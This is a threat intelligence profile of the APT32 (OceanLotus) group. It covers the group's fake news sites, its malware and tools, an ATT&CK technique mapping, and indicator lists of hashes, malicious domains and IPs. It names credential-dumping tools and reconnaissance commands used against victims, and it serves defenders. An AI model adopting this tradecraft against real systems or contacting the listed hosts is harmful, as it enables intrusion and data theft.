Resources Used:
https://malpedia.caad.fkie.fraunhofer.de/actor/apt32
https://attack.mitre.org/groups/G0050/
https://www.mandiant.com/resources/cyber-espionage-apt32
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-apt32-ocean-lotus-active-iocs
https://otx.alienvault.com/pulse/60f7bcf1e4dc34e4372833a4
KEYWORDS
APT (Advanced Persistent Threat): The concept of an advanced persistent threat (APT) is a targeted cyber attack in which the attacker gains access to a network and remains undetected for an extended period of time. APT group attacks, which can also be state-sponsored, are launched to damage the target organization's network or steal data. For this reason, it is necessary to create and manage many different solutions, security tools and rules.
Scheduled Task: It is a program or script that will be executed over a period of time, at regular intervals, or when a defined event occurs. Attackers use this technique when they infect the system with malware.
Backdoor: It is software that provides information transfer and communication to any desired resource by creating a backdoor within the target system.
Privilege Escalation: It is a privilege escalation method performed by the attacker to gain all permissions on the victim system.
Pivoting: It is the process of jumping to different areas or files between systems within the victim system.
Ransomware: Ransomware captures and encrypts data on the infected system. The attacker demands a ransom from the victim in exchange for the password. This software can also cause potential financial losses for companies.
Phishing: It is known as a phishing attack. In other words, they are attacks to mislead and deceive the target.
Persistence: It is the process of regaining access, that is, ensuring permanence, in cases where the attacker's access to the system is lost.
Reconnaissance: It is the stage of collecting information about the target network and system using active and passive methods.
Resource Development: It is the stage of arming against the target, that is, creating the knowledge and communication infrastructures to be used against it.
Initial Access: It is the first contact phase created with the sacrifice system. It can also be called the first step of the attack.
Execution: It is the phase of executing the malicious software that is transmitted to the victim system by the attackers on the system.
Defense Evasion: It is the stage of hiding the malicious software within the system. The aim here is to reduce the detectability rate to a minimum level.
Credential Access: This is the stage where login and password information about the victim system is captured.
Discovery: It consists of techniques that an attacker can use to gain information about the system and network.
Collection: It is the stage of collecting data (audio, video, image, keyboard inputs, etc.) from the victim system by the attacker.
Command and Control(C2): It consists of techniques that attackers can use to communicate with systems they control within a victim network. Attackers often try to mimic normal traffic on the system to avoid detection.
Exfiltration: It is the stage where they use certain techniques to avoid detection while the important information on the victim machine is transmitted to the server determined by the attacker. Here, the command and control server can be given as an example.
injection-chain: As can be understood from the concept of injection, it is the stage when malware infects the system.
IoC: It can be described as forensic evidence of possible intrusions on the host system or network. It allows information security experts or system administrators to detect intrusion attempts or other malicious activities by attackers on the victim system. This data can be IP, hostname, domain or hash algorithm.
TTP: Technique, Tactics and Procedure are the whole of the attack types, forms and motivations they have used in the past, as well as the activities they may do in the future, which are specific to each attacker or group of attackers.
APT 32 (OceanLotus/Cobalt Kitty/APT-C-00/SeaLotus)
APT32, one of the potential attack groups known by various names; It is known for its differentiated attack activities against private companies, foreign governments, journalists and activists. The group's known activity dates back to 2012, when it began attacking Chinese assets before expanding to attacks across the Asian continent, including Vietnam and the Philippines. A new investigation by Amnesty International has also identified a campaign of spyware attacks targeting Vietnamese human rights defenders (HRDs) from February 2018 to November 2020.
What are their motivations?
OceanLotus is known to target foreign organizations working in Vietnam, including media, research and construction. Although their motivations are not fully understood at this point, it is thought that their main purpose is espionage work to help Vietnamese companies.
Example Cyber Attacks
1-) Newsworthy Websites
APT32, known as the OceanLotus group, creates Vietnamese news websites that appear to have been compromised. The purpose here is to collect information about site visitors and, in some cases, distribute malware to large audiences through site visits.
Articles on the site contain malicious content. Additionally, some of the sites they create focus on Vietnamese news, while others focus on news themed around other Southeast Asian countries.
For example, a few websites that were previously created and are not currently active are as follows:
baodachieu.com
This website covers general news and is written in Vietnamese. It has a special logo and slogan.
nhansudaihoi13.org
This website was created based on news about the 13th National Congress of the Communist Party of Vietnam, which will be held in January 2021. It does not have a special logo or slogan.
laostimenews.com
This website covers general news. The content is written in English and Laotian. It appears to derive most of its content from the website of the Laotian Times (laotiantimes.com). It does not have a special logo or slogan.
khmerleaks.com
This website focuses specifically on news based in Cambodia. It offers content in Cambodian and English. Its slogan is "Be informed about the hottest news about the country." It is in the form.
2-) Targeting Visitors
The websites they create include numerous articles and blogs to look realistic. Signatures and even watermarks on published articles and images directly indicate where the article was taken from.
Visitors to these websites can be targeted in two ways:
– Pages that can be used to determine information about users who visit the website by chance can be targeted through profile creation areas.
– Targeted phishing attacks can be targeted by sending news links containing malware to victims.
For example, when users visit the page containing the infection chain, malicious JavaScript code is loaded onto the victim computer.
Even if it is not currently active, sample website images are as follows:
– An example is a snippet from the fake site “baomoivietnam.com” designed to send visitors a phishing link.
List of Malware and Tools Used by APT 32
1-) Harp: Arp was used to view and manipulate information about the system's Address Resolution Protocol (ARP) cache.
2-) Cobalt Strike: Cobalt Strike is a commercial tool that describes itself as “attacker simulation software designed to conduct targeted attacks and mimic the post-exploitation actions of advanced threat actors (APTs).” It is a system that includes Cobalt Strike's interactive post-attack capabilities and ATT&CK tactics. Unlicensed versions of Cobalt Strike have also been used by different attacker groups in recent years, including Ocean Lotus.
3-) Denis: The Denis tool is a Windows backdoor and Trojan. It has some similarities with the Soundbite backdoor and has been used with the Goopy backdoor.
4-) Ipconfig: Ipconfig is a program used to collect information about the TCP/IP, DNS, DHCP status of a system.
5-) Kerrdown: Kerrdown is special download software used to install spyware on a server on the victim's network.
6-) Comprogo: Comprogo; It is a signature backdoor that can manage transactions, files and records.
7-) Mimikatz: Mimikatz is software used to retrieve account login and password information from an operating system or software, normally in the form of a hash or cleartext password. Stolen credentials can then be used to access restricted information using the lateral movement technique.
😎 Net: Net program is a component of the Windows operating system. It is used in command line operations to control users, groups, services and network connections.
9-) Netsh: Netsh is a program used to interact with network components on local or remote systems.
10-) OSX_OCEANLOTUS.D: OSX_OCEANLOTUS.D is a Mac OS backdoor used by APT32 that has several variants.
11-) Phoreal: PHOREAL is a signature backdoor used by APT32.
12-) Soundbite: SOUNDBITE is a signature backdoor used by APT32.
13-) Windshield: WINDSHIELD is a special backdoor used by APT32.
APT 32 Exemplary Activity Chain
– In 2016, Vietnamese and foreign-funded companies working in the network security, technology infrastructure, banking and media sectors were targeted.
– In mid-2016, malware that FireEye believed to be specific to APT32 was detected in the networks of a global hospitality industry developer that was planning to expand its operations to Vietnam.
– From 2016 to 2017, subsidiaries of US and Philippine consumer products companies based in Vietnam were the targets of APT32 attacks.
– In 2015 and 2016, two Vietnamese media outlets were targeted with malware, as noted in FireEye's report.
– Cambodian human rights organization LICADHO was targeted in 2018.
The table below shows a table created in 2017 for the activities of the APT32 group, including malware families.
APT 32 MITER ATT&CK Technical and Tactical List
1.Reconnaissance
Gather Victim Identity Information: APT32 targeted activists and bloggers and collected victims' email addresses with spyware.
Phishing for Information: APT32 redirects users to web pages containing malicious links to collect personally identifiable information.
T1589.002 Gather Victim Identity Information: Email Addresses
T1598.003 Phishing for Information: Spearphishing Link
2.Resource Development
Acquire Infrastructure: APT32 has established websites to collect information and distribute malware.
Established Accounts: APT32 has set up Facebook pages with fake websites.
Obtain Capabilities: It used tools like APT32, Mimikatz, and Cobalt Strike, as well as various other open source tools from GitHub.
Stage Capabilities: APT32 hosted payloads on Dropbox, Amazon S3, and Google Drive for use on victim systems. In addition, in order to look realistic, he created websites containing many articles taken from the internet. These pages infect victims with malicious JavaScript code.
T1583.001 Acquire Infrastructure: Domains
T1583.006 Acquire Infrastructure: Web Services
T1585.001 Establish Accounts: Social Media Accounts
T1588.002 Obtain Capabilities: Tool
T1608.004 Stage Capabilities: Drive-by Target
T1608.001 Stage Capabilities: Upload Malware
3.Initial Access
Drive-by Compromise: It infected victims by using phishing techniques to trick them into visiting compromised watering hole websites.
Phishing: He sent targeted spearphishing emails containing malicious and executable files disguised as documents or spreadsheets.
Valid Accounts: He used local administrator account credentials, which are legitimate.
T1189 Drive-by Compromise
T1566.001 Phishing: Spearphishing Attachment
T1566.002 Phishing: Spearphishing Link
T1078.003 Valid Accounts: Local Accounts
4.Execution
Command and Scripting Interpreter: APT32 used cmd.exe to run COM scripts and PowerShell-based tools to download Cobalt Strike modules. Also used Macros, COM scripts and VBS scripts with JavaScript commands for C2 communications.
Exploitation for Client Execution: APT32 used RTF documents to execute malicious code. (CVE-2017-11882)
Scheduled Task/Job: APT32 used scheduled tasks to persist on victim systems.
Software Deployment Tools: APT32 compromised McAfee ePO to implement lateral movement technique through malware.
System Services: APT32's backdoor exploited Windows services to execute malicious payloads.
User Execution: APT32 forces users to run a malicious dropper sent via a spearphishing method. It also included a malicious link in phishing emails, directing victims to download the Cobalt Strike beacon.
Windows Management Instrumentation: APT32 used WMI to interact with local and remote systems, using it as a means to perform a variety of behaviors such as collecting information for reconnaissance as well as remote execution of files as part of the lateral movement technique.
T1059.007 Command and Scripting Interpreter: JavaScript
T1059.001 Command and Scripting Interpreter: PowerShell
T1059.005 Command and Scripting Interpreter: Visual Basic
T1059.003 Command and Scripting Interpreter: Windows Command Shell
T1203 Exploitation for Client Execution
T1053.005 Scheduled Task/Job: Scheduled Task
T1072 Software Deployment Tools
T1509.002 System Services: Services Execution
T1204.002 User Execution: Malicious File
T1204.001 User Execution: Malicious Link
T1047 Windows Management Instrumentation
5.Persistence
Boot or Logon Autostart Execution: APT32 provides persistence by using Registry Execution keys to execute both PowerShell and VBS scripts and backdoors directly on the system.
Create or Modify System Process: APT32 replaced Windows Services by loading PowerShell scripts into the system. It has also created a Windows service to provide persistence.
Hijack Execution Flow: APT32 executed its own payloads by hijacking the way operating systems run programs.
Office Application Startup: APT32 modified the VbaProject.OTM file of Microsoft Outlook to install the backdoor macro into the system to ensure permanence.
Scheduled Task/Job: APT32 used scheduled tasks to persist on victim systems.
Server Software Component: APT32 used Web Shells to maintain access to victim websites.
Valid Accounts: APT32 used real local administrator account credentials.
T1547.001 Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder
T1543.003 Create or Modify System Process: Windows Service
T1574.002 Hijack Execution Flow: DLL Side-Loading
T1137 Office Application Startup
T1053.005 Scheduled Task/Job: Scheduled Task
T1505.003 Server Software Component: Web Shell
T1078.003 Valid Accounts: Local Accounts
6.Privilege Escalation
Boot or Logon Autostart Execution: APT32; configured the system settings to execute the program to protect the system bootloader, persistence at login, or gain high-level privileges on compromised systems.
Create or Modify System Process: As part of persistence, APT32 has created system-level processes to repeatedly execute malicious payloads, including when operating systems are booted.
Exploitation for Privilege Escalation: APT32 used CVE-2016-7255 to escalate privilege.
Hijack Execution Flow: Attackers can execute their own malicious payloads by hijacking the way operating systems run programs.
Process Injection: APT32 malware injected a Cobalt Strike beacon into Rundll32.exe.
Scheduled Task/Job: APT32 used scheduled tasks to persist on victim systems.
Valid Accounts: APT32 used real local administrator account credentials.
T1547.001 Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder
T1543.003 Create or Modify System Process: Windows Service
T1068 Exploitation for Privilege Escalation
T1574.002 Hijack Execution Flow: DLL Side-Loading
T1055 Process Injection
T1053.005 Scheduled Task/Job: Scheduled Task
T1078.003 Valid Accounts: Local Accounts
7.Defense Evasion
File and Directory Permissions Modification: The macOS backdoor of APT32 changed the permission of the file it wanted to execute to 755.
Hide Artifacts: APT32's macOS backdoor has hidden the clientID file via a chflags function. PowerShell used the WindowsStyle parameter to hide its windows. It also used alternative data streams to NTFS to hide its payloads.
Hijack Execution Flow: APT32 ran legally signed executables from Symantec and McAfee that loaded a malicious DLL.
Indicator Removal on Host: APT32 has cleared certain event log entries on the system.
Masquerading: APT32 disguised a Cobalt Strike beacon as a Flash Loader. To avoid detection, he renamed the pubprn.vbs file by moving it to a .txt file. It renamed a NetCat binary to kb-10233.exe to look like a Windows update. It also renamed a Cobalt Strike beacon payload to install_flashplayers.exe.
Modify Registry: It modified the Windows Registry to store the configuration of the backdoor used by APT32.
Obfuscated Files or Information: APT32 has implemented other code obfuscation by using the Invoke-Obfuscation framework to obfuscate their PowerShell. APT32 also encoded its payloads using Base64 and a framework called 'Dont-Kill-My-Cat (DKMC). They also encrypted the library used for network penetration with AES-256 in CBC mode from their own macOS backdoor.
Process Injection: APT32 can inject code into processes to evade process-based defenses and elevate authority over the system.
System Binary Proxy Execution: APT32 used mshta.exe for code execution on the victim system. He also created a scheduled task that uses regsvr32.exe to execute a COM script that dynamically downloads a backdoor and injects it into memory. He used regsvr32 to run the backdoors. It used rundll32.exe to carry out the initial infection process of the malware.
System Script Proxy Execution: APT32 used PubPrn.vbs to execute its malware on the system, bypassing defense mechanisms.
Use Alternate Authentication Material: Attackers can use alternative authentication methods such as password hashes and Kerberos tickets to bypass system access controls using the lateral movement technique in an environment. Here, APT32 used pass to hash in the lateral movement technique. Additionally, APT32 successfully gained remote access using ticket pass.
Valid Accounts: Attackers can obtain and misuse the credentials of accounts in the victim system through initial access, persistence, privilege escalation or defense evasion techniques. The APT32 group used this method.
T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification
T1564.001 Hide Artifacts: Hidden Files and Directories
T1564.003 Hide Artifacts: Hidden Window
T1564.004 Hide Artifacts: NTFS File Attributes
T1574.002 Hijack Execution Flow: DLL Side-Loading
T1070.001 Indicator Removal on Host: Clear Windows Event Logs
T1070.004 Indicator Removal on Host: File Deletion
T1070.006 Indicator Removal on Host: Timestamp
T1036.004 Masquerading: Masquerade Task or Service
T1036.005 Masquerading: Match Legitimate Name or Location
T1036.003 Masquerading: Rename System Utilities
T1112 Modify Registry
T1027.001 Obfuscated Files or Information: Binary Padding
T1055 Process Injection
T1218.005 System Binary Proxy Execution: Mshta
T1218.010 System Binary Proxy Execution: Regsvr32
T1218.011 System Binary Proxy Execution: Rundll32
T1216.001 System Script Proxy Execution: PubPrn
T1550.002 Use Alternate Authentication Material: Pass the Hash
T1550.003 Use Alternate Authentication Material: Pass the Ticket
T1078.003 Valid Accounts: Local Accounts
8.Credential Access
Input Capture: APT32 misused PasswordChangeNotify to track and capture account password changes.
OS Credential Dumping: APT32 used GetPassword_x64, Mimikatz, and customized versions of Windows Credential Dumper to collect credentials.
Unsecured Credentials: APT32 used Outlook Credential Dumper to collect credentials stored in the Windows registry.
T1056.001 Input Capture: Keylogging
T1003.001 OS Credential Dumping: LSASS Memory
T1552.002 Unsecured Credentials: Credentials in Registry
9.Discovery
Account Discovery: APT32 listed administrative users using the “net localgroup administrators” commands.
File and Directory Discovery: APT32's backdoor is capable of listing files and directories on a machine.
Network Service Discovery: APT32 scanned the network looking for open ports, services, operating system fingerprinting, and other vulnerabilities.
Network Share Discovery: APT32 used the “net view” command to show all existing shares, including administrative shares such as “C$” and “ADMIN$”.
Query Registry: APT32's backdoor collected information about the victim system by querying the Windows Registry.
Remote System Discovery: APT32, “ “DC servers are enumerated using “Domain Controllers” and “net group”. The group also used the “ping” command.
System Information Discovery: APT32 collected the operating system version and computer name from victims. One of the group's backdoors also queries the Windows Registry to gather system information, and another mac OS backdoor can fingerprint the machine on its initial connection to the C&C server. It ran the shell code to identify the hostname of the infected computer.
System Network Configuration Discovery: APT32 used the “ipconfig /all” command to collect the IP address from the system.
System Network Connections Discovery: APT32 used the “netstat -anpo tcp” command to display TCP connections on the victim machine.
System Owner/User Discovery: APT32 executed the “whoami” command on the system to collect victim machine hostname information. He also ran the shell code to obtain the user hostname information on the victim machine.
T1087.001 Account Discovery: Local Account
T1083 File and Directory Discovery
T1046 Network Service Discovery
T1135 Network Share Discovery
T1012 Query Registry
T1018 Remote System Discovery
T1082 System Information Discovery
T1016 System Network Configuration Discovery
T1049 System Network Connections Discovery
T1033 System Owner/User Discovery
10.Lateral Movement
Lateral Tool Transfer: APT32 deployed its tools to victim systems after horizontal migration using administrative accounts.
Remote Services: APT32 used the Net to execute its tools, copy them to remote machines, and exploit Windows' hidden network shares.
Software Deployment Tools: APT32 compromised McAfee ePO for lateral movement by distributing malware as a software distribution task.
Use Alternate Authentication Material: APT32 can use alternative authentication materials such as password hashes and Kerberos tickets to bypass system access controls using the lateral movement technique in an environment. Here, he used pass to hash in the lateral movement technique. Additionally, he successfully obtained remote access using ticket pass.
T1570 Lateral Tool Transfer
T1021.002 Remote Services: SMB/Windows Admin Shares
T1072 Software Deployment Tools
T1550.002 Use Alternate Authentication Material: Pass the Hash
T1550.003 Use Alternate Authentication Material: Pass the Ticket
11.Collection
Archive Collected Data: APT32's backdoor used LZMA compression and RC4 encryption algorithm before infiltration.
Input Capture: APT32 used methods to capture user input to obtain personally identifiable information or collect information.
T1560 Archive Collected Data
T1056.001 Input Capture: Keylogging
12.Command and Control
Application Layer Protocol: APT32 used JavaScript to communicate over HTTP or HTTPS to the malicious domains they created to download additional frameworks. Also used email for C2 via Office macro.
Ingress Tool Transfer: APT32 injected JavaScript into victim websites to download additional frameworks that profile and compromise website visitors.
Non-Standard Port: An APT32 backdoor used HTTP over a non-standard TCP port (e.g. 14146) specified in the backdoor configuration.
Web Service: APT32 used Dropbox, Amazon S3, and Google Drive to store malicious downloads.
T1071.003 Application Layer Protocol: Mail Protocols
T1071.001 Application Layer Protocol: Web Protocols
T1105 Ingress Tool Transfer
T1571 Non-Standard Port
T1102 Web Service
13.Exfiltration
Exfiltration Over Alternative Protocol: APT32 steals data from the command-and-control channel using a protocol. DNS can be given as an example protocol.
Exfiltration Over C2 Channel: APT32's backdoor leaked data through a previously opened channel with the C&C server.
T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol
T1041 Exfiltration Over C2 Channel
You can visually access the attack navigator from the link below:
List of Example Indicators of Compromise (IoC)
MD5
9602d1e23d8f32f31f475beb057da271
3273dde8b51915160ababbe6092bfce2
fc164ff402e76ec692c38fa568d4e7bd
e785b68a4a0502f3abeeba137db8f9cd
SHA-256
8b1b20dc5f0b9fda45aa888cd3c298a52d5a923d84e5fcddc6e64d3f042f9a67
8f031098e3722d2662203fafc57bafc927a6deb7424982102f45a1da6964806b
4991093dbb8e839785abff95058b1e577c75160b9576a68e4ed84337eeed9335
e2fba9178320650553a41a2494ed2607d1923eef38f7e9d01a82ebac0865caf3
SHA1
274efe297fd708fcb5a6d086eb045e316f91ccbe
1495285a07f9e55c04efc5c380b5ab201ac94f7c
a9c88aa6d725fef2aea04e40becffa926ac6a6fa
440460e49af5d3bfa55bf781d72d4de12f128e0a
DOMAIN
urnage.com
ucairtz.com
ucaargo.com
tulationeva.com
tsworthoa.com
traveroyce.com
tonholding.com
vphelp.net
volver.net
vitlescaux.com
HOSTNAME
zone.apize.net
yii.yiihao126.net
worker.baraeme.com
utitled.po9z.com
tops.gamecourses.com
support.chatconnecting.com
stack.inveglob.net
ssl.zin0.com
share.codehao.net
seri.volveri.net
IPv4
158.69.100.199
164.132.45.67
176.107.176.6
176.107.177.216
184.95.51.179
184.95.51.181
184.95.51.190
185.157.79.3
192.121.176.148
198.50.191.195